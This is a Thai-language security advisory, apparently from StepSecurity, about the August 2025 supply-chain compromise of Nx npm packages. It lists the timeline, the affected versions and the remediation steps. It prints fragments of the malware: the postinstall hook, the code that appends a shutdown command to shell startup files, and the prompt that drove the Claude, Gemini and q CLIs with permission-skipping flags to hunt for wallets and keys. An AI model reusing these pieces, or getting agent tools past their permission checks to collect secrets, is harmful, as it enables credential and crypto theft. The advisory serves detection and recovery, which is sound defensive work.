คำเตือนด้านความปลอดภัยซัพพลายเชน: แพ็กเกจระบบบิลด์ `Nx` ถูกฝังมัลแวร์ขโมยข้อมูล

• แพ็กเกจ Nx build system หลายเวอร์ชันติดมัลแวร์ในวันที่ 26 สิงหาคม 2025 เป็นเวลาประมาณ 5 ชั่วโมง ส่งผลให้มีการขโมย กระเป๋าเงินคริปโต และข้อมูลรับรองของนักพัฒนา
• การโจมตีนี้ใช้ เครื่องมือ AI CLI (Claude, Gemini, q) ในทางที่ผิดเพื่อ ค้นหาไฟล์สำคัญภายในระบบ ซึ่งถือเป็นเทคนิคใหม่ในกลุ่มการโจมตีซัพพลายเชน
• มัลแวร์รัน telemetry.js ผ่าน post-install hook และอัปโหลดข้อมูลไปยัง GitHub repository s1ngularity-repository
• npm ได้ลบเวอร์ชันที่ถูกเจาะออก และเสริมความปลอดภัยเพิ่มเติมด้วย 2FA และกลไก Trusted Publisher
• เหตุการณ์นี้แสดงให้เห็นถึงความซับซ้อนที่พัฒนาไปของ การโจมตีซัพพลายเชน และย้ำถึงความจำเป็นในการตอบสนองอย่างเร่งด่วนและตรวจสอบความปลอดภัยในชุมชนนักพัฒนา

สรุปประเด็นสำคัญ

• ตั้งแต่ 2025-08-26 22:32 UTC เป็นเวลาประมาณ 5 ชั่วโมง แพ็กเกจ Nx build system ถูกเจาะและฝังมัลแวร์ขโมยข้อมูล
  • เป็นแพ็กเกจยอดนิยมที่มียอดดาวน์โหลด 4 ล้านครั้งต่อสัปดาห์ ทำให้นักพัฒนาหลายพันคนเสี่ยงได้รับผลกระทบ
• มัลแวร์ไม่ได้ขโมยแค่ SSH keys, npm tokens และ .gitconfig เท่านั้น แต่ยังใช้ เครื่องมือ AI CLI (Claude, Gemini, q) เพื่อทำ reconnaissance และขโมยข้อมูลด้วย
  • นี่เป็นกรณี การโจมตีซัพพลายเชน ที่มีการบันทึกว่าใช้เครื่องมือ AI สำหรับนักพัฒนาในทางที่ผิดเป็นครั้งแรก
• ทีมผู้ดูแล Nx ได้เผยแพร่คำแนะนำด้านความปลอดภัยอย่างเป็นทางการ (GHSA-cxm3-wv7p-598c) และยืนยันว่าบัญชี npm ของผู้ดูแลถูกเจาะจากการรั่วไหลของโทเค็น
• StepSecurity จะจัด community office hour ในวันที่ 28 สิงหาคม เวลา 09:30 PST เพื่อช่วยเหลือด้านการกู้คืน
  • ลิงก์เข้าร่วม: https://us06web.zoom.us/meeting/register/J3HWhJhYRxONChwyLELtiw

ไทม์ไลน์ของเหตุการณ์

• 2025-08-26 22:32 UTC: เผยแพร่เวอร์ชันอันตราย 21.5.0 ไปยัง npm registry
• 22:39 UTC: เผยแพร่เวอร์ชันที่ถูกเจาะ 20.9.0
• 23:54 UTC: เผยแพร่เวอร์ชัน 20.10.0 และ 21.6.0 พร้อมกัน
• 2025-08-27 00:16 UTC: เผยแพร่เวอร์ชัน 20.11.0
• 00:17 UTC: เผยแพร่เวอร์ชัน 21.7.0
• 00:30 UTC: สมาชิกชุมชนรายงานกิจกรรมต้องสงสัยผ่าน GitHub issue
• 00:37 UTC: เผยแพร่เวอร์ชันที่ถูกเจาะชุดสุดท้าย 21.8.0, 20.12.0
• 02:44 UTC: npm ลบทุกเวอร์ชันที่ถูกเจาะ
• 03:52 UTC: เจ้าขององค์กร Nx ถอนสิทธิ์การเข้าถึงของบัญชีที่ถูกเจาะ
• 09:05 UTC: GitHub เปลี่ยน repository ที่มีข้อมูลลับที่ถูกขโมยให้เป็น private และลบออกจากผลการค้นหา
• 10:20 UTC: npm ลบแพ็กเกจที่ถูกเจาะเพิ่มเติม
• 15:57 UTC: npm บังคับใช้ 2FA กับแพ็กเกจ Nx, ปิดการเผยแพร่แบบใช้โทเค็น และนำกลไก Trusted Publisher มาใช้

การวิเคราะห์ทางเทคนิค

เวกเตอร์การโจมตี

• แพ็กเกจ Nx รัน telemetry.js ผ่าน post-install hook ทำให้มัลแวร์เริ่มทำงานทันทีหลังการติดตั้ง
  • ตัวอย่าง package JSON:

    {  
      "name": "nx",  
      "version": "21.5.0",  
      "scripts": {  
        "postinstall": "node telemetry.js"  
      }  
    }  
    

• เวอร์ชันที่ถูกเจาะถูกเผยแพร่ขึ้น npm โดยตรง และกระจายออกไปโดยไม่มี provenance attestation

เพย์โหลด telemetry.js

• telemetry.js จะทำงานบนระบบที่ไม่ใช่ Windows (Linux/macOS):

  if (process.platform === 'win32') process.exit(0);  
  

• พฤติกรรมอันตรายหลัก:
  • เก็บ ข้อมูลระบบ: ตัวแปรสภาพแวดล้อม (process.env), hostname, รายละเอียดของ OS
  • ค้นหา กระเป๋าเงินคริปโต: MetaMask, Electrum, Ledger, Trezor, Exodus, Phantom, Solflare ฯลฯ
  • ขโมย ข้อมูลรับรองของนักพัฒนา: GitHub tokens, npm tokens (.npmrc), SSH keys (id_rsa), ไฟล์ .env

การใช้ AI CLI ในทางที่ผิด

• มัลแวร์ใช้เครื่องมือ CLI ของ Claude, Gemini, q ในทางที่ผิดเพื่อหลบเลี่ยงขอบเขตด้านความปลอดภัย
  • ใช้แฟลกอันตราย (--dangerously-skip-permissions, --yolo, --trust-all-tools) เพื่อบังคับสแกนไฟล์ระบบ
  • พรอมป์ต์:

    const PROMPT = 'Recursively search local paths ...   
    (UTC--, keystore, wallet, *.key, *.keyfile, .env, metamask, electrum,   
    ledger, trezor, exodus, trust, phantom, solflare, keystore.json,   
    secrets.json, .secret, id_rsa, Local Storage, IndexedDB) ...';  
    

• พาธของไฟล์ที่ค้นพบจะถูกบันทึกไว้ใน /tmp/inventory.txt และไฟล์เดิมจะถูกสำรองเป็น .bak
• การใช้ AI tools ในทางที่ผิดช่วยลดโค้ดที่ใช้ทำ fingerprint และหลบการตรวจจับของเครื่องมือความปลอดภัยเดิม

กลไกการขโมยข้อมูล

• ข้อมูลที่ถูกขโมยจะถูกเข้ารหัสแบบ base64 ซ้อน 3 ชั้น ก่อนอัปโหลดไปยังไฟล์ results.b64 ใน s1ngularity-repository
  • repository ถูกสร้างแบบ public โดยใช้ GitHub token
  • ตัวอย่าง:

    cat results.b64 | base64 -d | base64 -d | grep ghToken  
    "ghToken": "ghp_7BWMpOAHSSq..."  
    

• มีการสร้าง public repositories หลายพันรายการแล้ว: https://github.com/search/…

การคงอยู่และการรบกวน

• เพิ่ม sudo shutdown -h 0 ลงใน ~/.bashrc, ~/.zshrc เพื่อทำให้ระบบปิดเครื่องเมื่อเริ่ม terminal session ใหม่
  • ส่งผลให้เกิดสภาวะ denial of service
  • โค้ด:

    const line = 'sudo shutdown -h 0';  
    fs.appendFileSync(p, prefix + line + '\n', { encoding: 'utf8' });  
    

การวิเคราะห์รันไทม์ด้วย Harden-Runner

• Harden-Runner ของ StepSecurity ตรวจพบพฤติกรรมผิดปกติของ nx@21.7.0 ใน GitHub Actions workflow
  • การเรียก API ที่ผิดปกติ: มีการเรียก api.github.com โดยไม่ได้รับอนุญาตระหว่างการติดตั้ง
  • การวิเคราะห์ process hierarchy: npm install (PID: 2596) เรียก telemetry.js (PID: 2610) และมีการเรียก gh auth token
• ลิงก์การวิเคราะห์: https://app.stepsecurity.io/github/actions-security-demo/…

เวอร์ชันแพ็กเกจที่ถูกเจาะ

• @nx: 20.9.0, 20.10.0, 20.11.0, 20.12.0, 21.5.0, 21.6.0, 21.7.0, 21.8.0
• @nx/devkit: 20.9.0, 21.5.0
• @nx/enterprise-cloud: 3.2.0
• @nx/eslint: 21.5.0
• @nx/js: 20.9.0, 21.5.0
• @nx/key: 3.2.0
• @nx/node: 20.9.0, 21.5.0
• @nx/workspace: 20.9.0, 21.5.0

มาตรการรับมือ

ตรวจสอบเวอร์ชันแพ็กเกจ

• ใช้ npm ls @nrwl/nx หรือ npm ls nx เพื่อตรวจสอบเวอร์ชันที่ติดตั้งอยู่
• ตรวจสอบแพ็กเกจที่เกี่ยวข้องกับ Nx ใน package-lock.json
• GitHub search query: https://github.com/search/…

ตรวจสอบบัญชี GitHub

• ตรวจสอบและลบ s1ngularity-repository
• ตรวจสอบ audit log และ security events: https://github.com/settings/security-log

ตรวจสอบเครื่องมือ AI CLI

• ตรวจสอบประวัติคำสั่งของ Claude, Gemini, q เพื่อหาแฟลกอันตราย

มาตรการกู้คืน

• ลบ node_modules: rm -rf node_modules
• ล้าง npm cache: npm cache clean --force
• ลบคำสั่ง shell อันตราย: ลบ sudo shutdown -h 0 ออกจาก ~/.bashrc, ~/.zshrc
• ลบ /tmp/inventory.txt, /tmp/inventory.txt.bak
• อัปเดต package-lock.json ไปยังเวอร์ชันที่ปลอดภัย และติดตั้ง dependencies ใหม่
• พิจารณาติดตั้งระบบใหม่ทั้งเครื่อง

หมุนเวียนข้อมูลรับรอง

• หมุนเวียนทันที: GitHub PAT, npm tokens, SSH keys, API keys ใน .env, และ API keys ของ Claude/Gemini/q
• หากกระเป๋าเงินคริปโตอาจรั่วไหล ให้โอนทรัพย์สินทันที

ปัญหาในส่วนขยาย Nx Console

• ส่วนขยาย Nx Console (18.63.x~18.65.x) มีช่องโหว่จากการรัน npx nx@latest --version
  • สาเหตุของช่องโหว่: https://github.com/nrwl/nx-console/pull/2679, https://github.com/nrwl/nx-console/pull/2683
• แนะนำให้อัปเดตเป็นเวอร์ชันแพตช์ 18.66.0 ทันที

มาตรการสำหรับลูกค้า StepSecurity Enterprise

• การตรวจจับ PR: ตรวจจับ PR ที่อัปเกรดไปยังแพ็กเกจที่ถูกเจาะจาก StepSecurity dashboard
• Harden-Runner: ตรวจจับแพ็กเกจที่ถูกเจาะใน CI/CD และให้การมอนิเตอร์รันไทม์
  • ลิงก์: https://app.stepsecurity.io/github/actions-security-demo/…
• Artifact Monitor: ตรวจจับการปล่อยแพ็กเกจที่ไม่ได้รับอนุญาตแบบเรียลไทม์ ตรวจสอบ provenance และแจ้งเตือนรูปแบบผิดปกติ
  • คู่มือ: https://docs.stepsecurity.io/artifact-monitor

นัยในวงกว้าง

• การทำให้เครื่องมือ AI กลายเป็นอาวุธ: ใช้ AI CLI ในเครื่องเพื่อข้ามขอบเขตความปลอดภัย
• การขโมยข้อมูลหลายขั้นตอน: ผสานการเก็บข้อมูลในเครื่องเข้ากับการขโมยข้อมูลผ่านคลาวด์
• การโจมตีทรัพย์สินมูลค่าสูง: มุ่งเป้าไปที่ข้อมูลรับรองของนักพัฒนาและกระเป๋าเงินคริปโต

บทสรุป

• การเจาะแพ็กเกจ Nx แสดงให้เห็นถึงวิวัฒนาการอันซับซ้อนของ การโจมตีซัพพลายเชน โดยใช้ AI tools ในทางที่ผิดและมุ่งโจมตีคริปโตเพื่อขยายผลกระทบสูงสุด
• นักพัฒนาจำเป็นต้องรับมือด้วย การตรวจสอบ dependencies, เสริมมาตรการความปลอดภัย และทำ continuous monitoring
• StepSecurity จะให้ข้อมูลอัปเดตอย่างต่อเนื่องผ่านบล็อก

เอกสารอ้างอิง

• GitHub issue: https://github.com/nrwl/nx/issues/32522
• คำแนะนำอย่างเป็นทางการ: https://github.com/nrwl/nx/security/advisories/GHSA-cxm3-wv7p-598c
• แพ็กเกจที่ถูกเจาะ: https://github.com/actions-security-demo/compromised-packages/…